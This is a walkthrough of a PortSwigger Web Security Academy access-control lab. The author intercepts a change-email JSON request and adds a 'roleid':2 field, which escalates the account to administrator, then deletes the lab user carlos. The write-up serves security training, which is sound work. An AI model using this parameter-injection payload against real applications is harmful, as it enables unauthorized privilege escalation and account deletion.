| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (Role Modifiable via Profile Update) |
| Difficulty | Apprentice |
| Objective | Access the admin panel and delete the user carlos |
User Role Can Be Modified in User Profile¶
Log in as wiener:peter. Trying:
web-security-academy.net/admin
Returns "Admin interface only available if logged in as an administrator." Nothing useful in the page source. Unlike some labs, there's no Admin= cookie to flip in the session. Checking /my-account:
There's a form to change email. Clicking update and intercepting:
POST /my-account/change-email HTTP/2
Host: 0a500042042a1602820de2a8006e00f2.web-security-academy.net
Cookie: session=bJ1VFvnTwUFH3R567riQp4XzJi1ebJdn
{"email":"[email protected]"
}
The lab description says admin access requires roleid=2. Since the email update is a JSON body we fully control, try adding that field directly:
{"email":"[email protected]",
"roleid":2
}
The response reflects it back:
{
"username": "wiener",
"email": "[email protected]",
"apikey": "PY2nReOWTlOtELTl5mZbm85MvJFatP5N",
"roleid": 2
}
roleid is now 2. Going to /admin:
Access granted. Clicking delete on carlos:
Lab is solved